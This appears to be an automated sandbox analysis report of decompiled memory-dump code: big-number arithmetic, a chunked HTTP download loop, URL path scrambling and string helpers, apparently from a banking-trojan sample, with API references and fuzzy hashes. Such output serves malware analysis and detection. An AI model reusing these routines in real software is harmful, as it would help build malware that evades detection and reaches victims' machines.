                                                                                  • Instruction ID: 7031bd39838088d3ca0c8f55a7575461ea694da1dc7d07ef4db97aadaeca4873
                                                                                  • Opcode Fuzzy Hash: 742403ffb6645ad21877b8464a8f8c0c7a8dafce2cc8100fd0c0b5fa9f4a9c4b
                                                                                  • Instruction Fuzzy Hash: AF514C75D0050AEFCB00DFA8D9C88AEF7B9FF88704B544594E915EB214D7359D02CBA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 85%
                                                                                  			E033F44C2(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                                                                  				intOrPtr _v8;
                                                                                  				intOrPtr _v12;
                                                                                  				signed int _v16;
                                                                                  				void _v92;
                                                                                  				void _v236;
                                                                                  				void* _t55;
                                                                                  				unsigned int _t56;
                                                                                  				signed int _t66;
                                                                                  				signed int _t74;
                                                                                  				void* _t76;
                                                                                  				signed int _t79;
                                                                                  				void* _t81;
                                                                                  				void* _t92;
                                                                                  				void* _t96;
                                                                                  				signed int* _t99;
                                                                                  				signed int _t101;
                                                                                  				signed int _t103;
                                                                                  				void* _t107;
                                                                                  
                                                                                  				_t92 = _a12;
                                                                                  				_t101 = __eax;
                                                                                  				_t55 = E033F43C6(_a16, _t92);
                                                                                  				_t79 = _t55;
                                                                                  				if(_t79 == 0) {
                                                                                  					L18:
                                                                                  					return _t55;
                                                                                  				}
                                                                                  				_t56 =  *(_t92 + _t79 * 4 - 4);
                                                                                  				_t81 = 0;
                                                                                  				_t96 = 0x20;
                                                                                  				if(_t56 == 0) {
                                                                                  					L4:
                                                                                  					_t97 = _t96 - _t81;
                                                                                  					_v12 = _t96 - _t81;
                                                                                  					E033FA966(_t79,  &_v236);
                                                                                  					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E033F8B07(_t101,  &_v236, _a8, _t96 - _t81);
                                                                                  					E033F8B07(_t79,  &_v92, _a12, _t97);
                                                                                  					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
                                                                                  					_t66 = E033FA966(_t101,  &E033FD168);
                                                                                  					_t103 = _t101 - _t79;
                                                                                  					_a8 = _t103;
                                                                                  					if(_t103 < 0) {
                                                                                  						L17:
                                                                                  						E033FA966(_a16, _a4);
                                                                                  						E033F3A1E(_t79,  &_v236, _a4, _t97);
                                                                                  						memset( &_v236, 0, 0x8c);
                                                                                  						_t55 = memset( &_v92, 0, 0x44);
                                                                                  						goto L18;
                                                                                  					}
                                                                                  					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
                                                                                  					do {
                                                                                  						if(_v8 != 0xffffffff) {
                                                                                  							_push(1);
                                                                                  							_push(0);
                                                                                  							_push(0);
                                                                                  							_push( *_t99);
                                                                                  							L033FAEE0();
                                                                                  							_t74 = _t66 +  *(_t99 - 4);
                                                                                  							asm("adc edx, esi");
                                                                                  							_push(0);
                                                                                  							_push(_v8 + 1);
                                                                                  							_push(_t92);
                                                                                  							_push(_t74);
                                                                                  							L033FAEDA();
                                                                                  							if(_t92 > 0 || _t74 > 0xffffffff) {
                                                                                  								_t74 = _t74 | 0xffffffff;
                                                                                  								_v16 = _v16 & 0x00000000;
                                                                                  							}
                                                                                  						} else {
                                                                                  							_t74 =  *_t99;
                                                                                  						}
                                                                                  						_t106 = _t107 + _a8 * 4 - 0xe8;
                                                                                  						_a12 = _t74;
                                                                                  						_t76 = E033F47A0(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
                                                                                  						while(1) {
                                                                                  							 *_t99 =  *_t99 - _t76;
                                                                                  							if( *_t99 != 0) {
                                                                                  								goto L14;
                                                                                  							}
                                                                                  							L13:
                                                                                  							_t92 =  &_v92;
                                                                                  							if(E033F337A(_t79, _t92, _t106) < 0) {
                                                                                  								break;
                                                                                  							}
                                                                                  							L14:
                                                                                  							_a12 = _a12 + 1;
                                                                                  							_t76 = E033F72D3(_t79,  &_v92, _t106, _t106);
                                                                                  							 *_t99 =  *_t99 - _t76;
                                                                                  							if( *_t99 != 0) {
                                                                                  								goto L14;
                                                                                  							}
                                                                                  							goto L13;
                                                                                  						}
                                                                                  						_a8 = _a8 - 1;
                                                                                  						_t66 = _a12;
                                                                                  						_t99 = _t99 - 4;
                                                                                  						 *(_a8 * 4 +  &E033FD168) = _t66;
                                                                                  					} while (_a8 >= 0);
                                                                                  					_t97 = _v12;
                                                                                  					goto L17;
                                                                                  				}
                                                                                  				while(_t81 < _t96) {
                                                                                  					_t81 = _t81 + 1;
                                                                                  					_t56 = _t56 >> 1;
                                                                                  					if(_t56 != 0) {
                                                                                  						continue;
                                                                                  					}
                                                                                  					goto L4;
                                                                                  				}
                                                                                  				goto L4;
                                                                                  			}






















                                                                                  APIs
                                                                                  • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 033F456F
                                                                                  • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 033F4585
                                                                                  • memset.NTDLL ref: 033F4625
                                                                                  • memset.NTDLL ref: 033F4635
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: memset$_allmul_aulldiv
                                                                                  • String ID:
                                                                                  • API String ID: 3041852380-0
                                                                                  • Opcode ID: 3ddc52d98494738c864ad3c10b37c0ee4f4191fa6e621a2f221ade9a97e3f5d4
                                                                                  • Instruction ID: 92bb86309113dbb38b792adc7de778681c7bad9eecd57bbc85aa815c7d453dac
                                                                                  • Opcode Fuzzy Hash: 3ddc52d98494738c864ad3c10b37c0ee4f4191fa6e621a2f221ade9a97e3f5d4
                                                                                  • Instruction Fuzzy Hash: E3418175A00249AFDB10EFA9DCC0BEF7779EF44310F808529EA19AB280DB709A55CB50
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 57%
                                                                                  			E033F43A3(void* __eax) {
                                                                                  				long _v8;
                                                                                  				char _v12;
                                                                                  				char _v16;
                                                                                  				intOrPtr _v20;
                                                                                  				void* _v24;
                                                                                  				void* __esi;
                                                                                  				void* _t41;
                                                                                  				char* _t42;
                                                                                  				long _t43;
                                                                                  				intOrPtr _t47;
                                                                                  				intOrPtr* _t48;
                                                                                  				char _t50;
                                                                                  				char* _t55;
                                                                                  				long _t56;
                                                                                  				intOrPtr* _t57;
                                                                                  				void* _t60;
                                                                                  				void* _t61;
                                                                                  				void* _t68;
                                                                                  				void* _t72;
                                                                                  				void* _t73;
                                                                                  				void* _t74;
                                                                                  				void* _t78;
                                                                                  
                                                                                  				_t72 = __eax;
                                                                                  				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
                                                                                  					L2:
                                                                                  					_t41 = _t72;
                                                                                  					_pop(_t73);
                                                                                  					_t74 = _t41;
                                                                                  					_t42 =  &_v12;
                                                                                  					_v8 = 0;
                                                                                  					_v16 = 0;
                                                                                  					__imp__( *((intOrPtr*)(_t74 + 0x18)), _t42, _t68, _t73, _t61, _t78);
                                                                                  					if(_t42 == 0) {
                                                                                  						_t43 = GetLastError();
                                                                                  						_v8 = _t43;
                                                                                  						if(_t43 == 0x2efe) {
                                                                                  							_v8 = 0;
                                                                                  							goto L29;
                                                                                  						}
                                                                                  					} else {
                                                                                  						if(_v12 == 0) {
                                                                                  							L29:
                                                                                  							 *((intOrPtr*)(_t74 + 0x30)) = 0;
                                                                                  						} else {
                                                                                  							_push( &_v24);
                                                                                  							_push(1);
                                                                                  							_push(0);
                                                                                  							if( *0x33fd138() != 0) {
                                                                                  								_v8 = 8;
                                                                                  							} else {
                                                                                  								_t47 = E033F75C4(0x1000);
                                                                                  								_v20 = _t47;
                                                                                  								if(_t47 == 0) {
                                                                                  									_v8 = 8;
                                                                                  								} else {
                                                                                  									goto L8;
                                                                                  									do {
                                                                                  										while(1) {
                                                                                  											L8:
                                                                                  											_t50 = _v12;
                                                                                  											if(_t50 >= 0x1000) {
                                                                                  												_t50 = 0x1000;
                                                                                  											}
                                                                                  											__imp__( *((intOrPtr*)(_t74 + 0x18)), _v20, _t50,  &_v16);
                                                                                  											if(_t50 == 0) {
                                                                                  												break;
                                                                                  											}
                                                                                  											_t57 = _v24;
                                                                                  											 *((intOrPtr*)( *_t57 + 0x10))(_t57, _v20, _v16, 0);
                                                                                  											_t18 =  &_v12;
                                                                                  											 *_t18 = _v12 - _v16;
                                                                                  											if( *_t18 != 0) {
                                                                                  												continue;
                                                                                  											} else {
                                                                                  											}
                                                                                  											L14:
                                                                                  											if(WaitForSingleObject( *0x33fd224, 0) != 0x102) {
                                                                                  												_v8 = 0x102;
                                                                                  											} else {
                                                                                  												_t55 =  &_v12;
                                                                                  												__imp__( *((intOrPtr*)(_t74 + 0x18)), _t55);
                                                                                  												if(_t55 != 0) {
                                                                                  													goto L19;
                                                                                  												} else {
                                                                                  													_t56 = GetLastError();
                                                                                  													_v8 = _t56;
                                                                                  													if(_t56 == 0x2f78 && _v12 == 0) {
                                                                                  														_v8 = 0;
                                                                                  														goto L19;
                                                                                  													}
                                                                                  												}
                                                                                  											}
                                                                                  											L22:
                                                                                  											E033F4C31(_v20);
                                                                                  											if(_v8 == 0) {
                                                                                  												_v8 = E033F4036(_v24, _t74);
                                                                                  											}
                                                                                  											goto L25;
                                                                                  										}
                                                                                  										_v8 = GetLastError();
                                                                                  										goto L14;
                                                                                  										L19:
                                                                                  									} while (_v12 != 0);
                                                                                  									goto L22;
                                                                                  								}
                                                                                  								L25:
                                                                                  								_t48 = _v24;
                                                                                  								 *((intOrPtr*)( *_t48 + 8))(_t48);
                                                                                  							}
                                                                                  						}
                                                                                  					}
                                                                                  					return _v8;
                                                                                  				} else {
                                                                                  					_t60 = E033F7F7F(__eax);
                                                                                  					if(_t60 != 0) {
                                                                                  						return _t60;
                                                                                  					} else {
                                                                                  						goto L2;
                                                                                  					}
                                                                                  				}
                                                                                  			}

                                                                                  APIs
                                                                                  • WaitForSingleObject.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,033F6CD4,00000000,?), ref: 033F6EA7
                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,033F6CD4,00000000,?,?), ref: 033F6EC7
                                                                                    • Part of subcall function 033F7F7F: wcstombs.NTDLL ref: 033F803F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: ErrorLastObjectSingleWaitwcstombs
                                                                                  • String ID:
                                                                                  • API String ID: 2344289193-0
                                                                                  • Opcode ID: 3854f220f741fbb8259aac6570a43e16baac37f40fc3746548201add4e5bace3
                                                                                  • Instruction ID: 8a256af8c3c0ecf3bd44da584bab50cd96d9a54c7bb4197aa13535dd785c9828
                                                                                  • Opcode Fuzzy Hash: 3854f220f741fbb8259aac6570a43e16baac37f40fc3746548201add4e5bace3
                                                                                  • Instruction Fuzzy Hash: 26413771900209EFDF20EFA5DAC59AEBBBCFB04349F9445AAE601E7250E7349A41DB10
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 68%
                                                                                  			E033F71BA(unsigned int __eax, void* __ecx) {
                                                                                  				void* _v8;
                                                                                  				void* _v12;
                                                                                  				signed int _t21;
                                                                                  				signed short _t23;
                                                                                  				char* _t27;
                                                                                  				void* _t29;
                                                                                  				void* _t30;
                                                                                  				unsigned int _t33;
                                                                                  				void* _t37;
                                                                                  				unsigned int _t38;
                                                                                  				void* _t41;
                                                                                  				void* _t42;
                                                                                  				int _t45;
                                                                                  				void* _t46;
                                                                                  
                                                                                  				_t42 = __eax;
                                                                                  				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                                                                                  				_t38 = __eax;
                                                                                  				_t30 = RtlAllocateHeap( *0x33fd1f0, 0, (__eax >> 3) + __eax + 1);
                                                                                  				_v12 = _t30;
                                                                                  				if(_t30 != 0) {
                                                                                  					_v8 = _t42;
                                                                                  					do {
                                                                                  						_t33 = 0x18;
                                                                                  						if(_t38 <= _t33) {
                                                                                  							_t33 = _t38;
                                                                                  						}
                                                                                  						_t21 =  *0x33fd208; // 0xddac9b47
                                                                                  						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                                                                                  						 *0x33fd208 = _t23;
                                                                                  						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                                                                                  						memcpy(_t30, _v8, _t45);
                                                                                  						_v8 = _v8 + _t45;
                                                                                  						_t27 = _t30 + _t45;
                                                                                  						_t38 = _t38 - _t45;
                                                                                  						_t46 = _t46 + 0xc;
                                                                                  						 *_t27 = 0x2f;
                                                                                  						_t13 = _t27 + 1; // 0x1
                                                                                  						_t30 = _t13;
                                                                                  					} while (_t38 > 8);
                                                                                  					memcpy(_t30, _v8, _t38 + 1);
                                                                                  				}
                                                                                  				return _v12;
                                                                                  			}

                                                                                  APIs
                                                                                  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,033F14A0,00000000,?,00000000,033F6C79,00000000,05F29630), ref: 033F71C5
                                                                                  • RtlAllocateHeap.NTDLL(00000000,?), ref: 033F71DD
                                                                                  • memcpy.NTDLL(00000000,05F29630,-00000008,?,?,?,033F14A0,00000000,?,00000000,033F6C79,00000000,05F29630), ref: 033F7221
                                                                                  • memcpy.NTDLL(00000001,05F29630,00000001,033F6C79,00000000,05F29630), ref: 033F7242
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: memcpy$AllocateHeaplstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 1819133394-0
                                                                                  • Opcode ID: 4193464e2d8220207a3381fb2afccb0d73d9997080f6d8db1fec21fc1a4f5ec9
                                                                                  • Instruction ID: 4cf17835ac548d89b56f458c740bf6ac4db27d72f4a0f59abf8f2ad59c68b8e6
                                                                                  • Opcode Fuzzy Hash: 4193464e2d8220207a3381fb2afccb0d73d9997080f6d8db1fec21fc1a4f5ec9
                                                                                  • Instruction Fuzzy Hash: 4D112972A00215BFD710EB69DCC8D9FBBBDEB85390F980276F505D7251E670DA0487A0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 53%
                                                                                  			E033F752B(char* __eax) {
                                                                                  				char* _t8;
                                                                                  				intOrPtr _t12;
                                                                                  				char* _t21;
                                                                                  				signed int _t23;
                                                                                  				char* _t24;
                                                                                  				signed int _t26;
                                                                                  				void* _t27;
                                                                                  
                                                                                  				_t21 = __eax;
                                                                                  				_push(0x20);
                                                                                  				_t23 = 1;
                                                                                  				_push(__eax);
                                                                                  				while(1) {
                                                                                  					_t8 = StrChrA();
                                                                                  					if(_t8 == 0) {
                                                                                  						break;
                                                                                  					}
                                                                                  					_t23 = _t23 + 1;
                                                                                  					_push(0x20);
                                                                                  					_push( &(_t8[1]));
                                                                                  				}
                                                                                  				_t12 = E033F75C4(_t23 << 2);
                                                                                  				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
                                                                                  				if(_t12 != 0) {
                                                                                  					StrTrimA(_t21, 0x33fc2bc);
                                                                                  					_t26 = 0;
                                                                                  					do {
                                                                                  						_t24 = StrChrA(_t21, 0x20);
                                                                                  						if(_t24 != 0) {
                                                                                  							 *_t24 = 0;
                                                                                  							_t24 =  &(_t24[1]);
                                                                                  							StrTrimA(_t24, 0x33fc2bc);
                                                                                  						}
                                                                                  						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
                                                                                  						_t26 = _t26 + 1;
                                                                                  						_t21 = _t24;
                                                                                  					} while (_t24 != 0);
                                                                                  					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
                                                                                  				}
                                                                                  				return 0;
                                                                                  			}

                                                                                  APIs
                                                                                  • StrChrA.SHLWAPI(?,00000020,00000000,05F2962C,?,?,?,033F5B5B,05F2962C,?,?,033F79CC), ref: 033F7545
                                                                                  • StrTrimA.SHLWAPI(?,033FC2BC,00000002,?,?,?,033F5B5B,05F2962C,?,?,033F79CC), ref: 033F7564
                                                                                  • StrChrA.SHLWAPI(?,00000020,?,?,?,033F5B5B,05F2962C,?,?,033F79CC,?,?,?,?,?,033F87DD), ref: 033F756F
                                                                                  • StrTrimA.SHLWAPI(00000001,033FC2BC,?,?,?,033F5B5B,05F2962C,?,?,033F79CC,?,?,?,?,?,033F87DD), ref: 033F7581
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: Trim
                                                                                  • String ID:
                                                                                  • API String ID: 3043112668-0
                                                                                  • Opcode ID: 256d98d666cfd9b669be2ba6101566cb78dddb789715c8910e70faf3f81145a3
                                                                                  • Instruction ID: a7edada84d8ef77503dc3393b46ba3fcc6601ef428ea2e81719444dc5818de01
                                                                                  • Opcode Fuzzy Hash: 256d98d666cfd9b669be2ba6101566cb78dddb789715c8910e70faf3f81145a3
                                                                                  • Instruction Fuzzy Hash: CD01B5716453166FD221DE698CC8F3BBF9CEB85AE4F51055DFA45C7341EA60C80182E4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 53%
                                                                                  			E033F4200(intOrPtr _a4, intOrPtr _a8) {
                                                                                  				char _v20;
                                                                                  				void* _t8;
                                                                                  				void* _t13;
                                                                                  				void* _t16;
                                                                                  				char* _t18;
                                                                                  				void* _t19;
                                                                                  
                                                                                  				_t19 = 0x27;
                                                                                  				_t1 =  &_v20; // 0x74666f53
                                                                                  				_t18 = 0;
                                                                                  				E033F5B70(_t8, _t1);
                                                                                  				_t16 = E033F75C4(_t19);
                                                                                  				if(_t16 != 0) {
                                                                                  					_t3 =  &_v20; // 0x74666f53
                                                                                  					_t13 = E033F39B5(_t3, _t16, _a8);
                                                                                  					if(_a4 != 0) {
                                                                                  						__imp__(_a4);
                                                                                  						_t19 = _t13 + 0x27;
                                                                                  					}
                                                                                  					_t18 = E033F75C4(_t19);
                                                                                  					if(_t18 != 0) {
                                                                                  						 *_t18 = 0;
                                                                                  						if(_a4 != 0) {
                                                                                  							__imp__(_t18, _a4);
                                                                                  						}
                                                                                  						__imp__(_t18, _t16);
                                                                                  					}
                                                                                  					E033F4C31(_t16);
                                                                                  				}
                                                                                  				return _t18;
                                                                                  			}

                                                                                  APIs
                                                                                    • Part of subcall function 033F75C4: RtlAllocateHeap.NTDLL(00000000,00000000,033F5068), ref: 033F75D0
                                                                                    • Part of subcall function 033F39B5: wsprintfA.USER32 ref: 033F3A11
                                                                                  • lstrlen.KERNEL32(?,00000000,00000000,00000027,E8FA7DD7,00000000,745EC740,033F70CE,74666F53,00000000,?,00000000,?,?,033F79D7), ref: 033F4236
                                                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 033F425A
                                                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 033F4262
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
                                                                                  • String ID: Soft
                                                                                  • API String ID: 393707159-3753413193
                                                                                  • Opcode ID: c63a063088a42f77ec1c7e311e40c3a1cc9c5350b9f329d89e4804354509254e
                                                                                  • Instruction ID: ea73026ca3c6617d391b961417cad26721aed4a0771b9aac527377b9df7e46d8
                                                                                  • Opcode Fuzzy Hash: c63a063088a42f77ec1c7e311e40c3a1cc9c5350b9f329d89e4804354509254e
                                                                                  • Instruction Fuzzy Hash: 7701A23650031A7FCB12FB65DCC4FAF7A6CDF85255F844421FA0559101DB78C54AC7A1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 50%
                                                                                  			E033F5B10(void** __esi) {
                                                                                  				char* _v0;
                                                                                  				intOrPtr _t4;
                                                                                  				intOrPtr _t6;
                                                                                  				void* _t8;
                                                                                  				intOrPtr _t11;
                                                                                  				void* _t12;
                                                                                  				void** _t14;
                                                                                  
                                                                                  				_t14 = __esi;
                                                                                  				_t4 =  *0x33fd2dc; // 0x5f29630
                                                                                  				__imp__(_t4 + 0x40);
                                                                                  				while(1) {
                                                                                  					_t6 =  *0x33fd2dc; // 0x5f29630
                                                                                  					_t1 = _t6 + 0x58; // 0x0
                                                                                  					if( *_t1 == 0) {
                                                                                  						break;
                                                                                  					}
                                                                                  					Sleep(0xa);
                                                                                  				}
                                                                                  				_t8 =  *_t14;
                                                                                  				if(_t8 != 0 && _t8 != 0x33fd030) {
                                                                                  					HeapFree( *0x33fd1f0, 0, _t8);
                                                                                  				}
                                                                                  				_t14[1] = E033F752B(_v0, _t14);
                                                                                  				_t11 =  *0x33fd2dc; // 0x5f29630
                                                                                  				_t12 = _t11 + 0x40;
                                                                                  				__imp__(_t12);
                                                                                  				return _t12;
                                                                                  			}

                                                                                  APIs
                                                                                  • RtlEnterCriticalSection.NTDLL(05F295F0), ref: 033F5B19
                                                                                  • Sleep.KERNEL32(0000000A,?,?,033F79CC,?,?,?,?,?,033F87DD,?,00000001), ref: 033F5B23
                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,033F79CC,?,?,?,?,?,033F87DD,?,00000001), ref: 033F5B4B
                                                                                  • RtlLeaveCriticalSection.NTDLL(05F295F0), ref: 033F5B67
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                  • String ID:
                                                                                  • API String ID: 58946197-0
                                                                                  • Opcode ID: 11a21e16b828de234b77d73b2588156db5dad867263af76657f335658953c175
                                                                                  • Instruction ID: 1e20a6804ffa2122c971bd7f70f149d55757d05428d351fb0c1b6c6b78d2b06a
                                                                                  • Opcode Fuzzy Hash: 11a21e16b828de234b77d73b2588156db5dad867263af76657f335658953c175
                                                                                  • Instruction Fuzzy Hash: D8F05874211242AFE714FF68ECC9F1AB7ACEB05340F848400F645C724CC624EC02DB68
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E033F310C() {
                                                                                  				void* _t1;
                                                                                  				intOrPtr _t5;
                                                                                  				void* _t6;
                                                                                  				void* _t7;
                                                                                  				void* _t11;
                                                                                  
                                                                                  				_t1 =  *0x33fd224; // 0x2d8
                                                                                  				if(_t1 == 0) {
                                                                                  					L8:
                                                                                  					return 0;
                                                                                  				}
                                                                                  				SetEvent(_t1);
                                                                                  				_t11 = 0x7fffffff;
                                                                                  				while(1) {
                                                                                  					SleepEx(0x64, 1);
                                                                                  					_t5 =  *0x33fd264; // 0x0
                                                                                  					if(_t5 == 0) {
                                                                                  						break;
                                                                                  					}
                                                                                  					_t11 = _t11 - 0x64;
                                                                                  					if(_t11 > 0) {
                                                                                  						continue;
                                                                                  					}
                                                                                  					break;
                                                                                  				}
                                                                                  				_t6 =  *0x33fd224; // 0x2d8
                                                                                  				if(_t6 != 0) {
                                                                                  					CloseHandle(_t6);
                                                                                  				}
                                                                                  				_t7 =  *0x33fd1f0; // 0x5b30000
                                                                                  				if(_t7 != 0) {
                                                                                  					HeapDestroy(_t7);
                                                                                  				}
                                                                                  				goto L8;
                                                                                  			}









                                                                                  APIs
                                                                                  • SetEvent.KERNEL32(000002D8,00000001,033FA615), ref: 033F3117
                                                                                  • SleepEx.KERNEL32(00000064,00000001), ref: 033F3126
                                                                                  • CloseHandle.KERNEL32(000002D8), ref: 033F3147
                                                                                  • HeapDestroy.KERNEL32(05B30000), ref: 033F3157
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: CloseDestroyEventHandleHeapSleep
                                                                                  • String ID:
                                                                                  • API String ID: 4109453060-0
                                                                                  • Opcode ID: 109b164b2f9cd67f3875cf59915639dbd5d9f2218e76a5ece554ddd52fb4774a
                                                                                  • Instruction ID: 363fa24a3eb4e159f7387e5113b886a7b95d0acbc664178364fefbe3ff6505ea
                                                                                  • Opcode Fuzzy Hash: 109b164b2f9cd67f3875cf59915639dbd5d9f2218e76a5ece554ddd52fb4774a
                                                                                  • Instruction Fuzzy Hash: 5BF0307574431AAFEB20BB74EDCCF06779CEB15BA1FC80510BA04D728CCB24C40586A0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 37%
                                                                                  			E033F10E4() {
                                                                                  				void* _v0;
                                                                                  				void** _t3;
                                                                                  				void** _t5;
                                                                                  				void** _t7;
                                                                                  				void** _t8;
                                                                                  				void* _t10;
                                                                                  
                                                                                  				_t3 =  *0x33fd2dc; // 0x5f29630
                                                                                  				__imp__( &(_t3[0x10]));
                                                                                  				while(1) {
                                                                                  					_t5 =  *0x33fd2dc; // 0x5f29630
                                                                                  					_t1 =  &(_t5[0x16]); // 0x0
                                                                                  					if( *_t1 == 0) {
                                                                                  						break;
                                                                                  					}
                                                                                  					Sleep(0xa);
                                                                                  				}
                                                                                  				_t7 =  *0x33fd2dc; // 0x5f29630
                                                                                  				_t10 =  *_t7;
                                                                                  				if(_t10 != 0 && _t10 != 0x33fe882) {
                                                                                  					HeapFree( *0x33fd1f0, 0, _t10);
                                                                                  					_t7 =  *0x33fd2dc; // 0x5f29630
                                                                                  				}
                                                                                  				 *_t7 = _v0;
                                                                                  				_t8 =  &(_t7[0x10]);
                                                                                  				__imp__(_t8);
                                                                                  				return _t8;
                                                                                  			}










                                                                                  APIs
                                                                                  • RtlEnterCriticalSection.NTDLL(05F295F0), ref: 033F10ED
                                                                                  • Sleep.KERNEL32(0000000A,?,?,033F79CC,?,?,?,?,?,033F87DD,?,00000001), ref: 033F10F7
                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,033F79CC,?,?,?,?,?,033F87DD,?,00000001), ref: 033F1125
                                                                                  • RtlLeaveCriticalSection.NTDLL(05F295F0), ref: 033F113A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.845087613.00000000033F1000.00000020.00000001.sdmp, Offset: 033F0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.845074663.00000000033F0000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845137539.00000000033FC000.00000002.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845175432.00000000033FD000.00000004.00000001.sdmp
                                                                                  • Associated: 00000002.00000002.845217807.00000000033FF000.00000002.00000001.sdmp
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                  • String ID:
                                                                                  • API String ID: 58946197-0
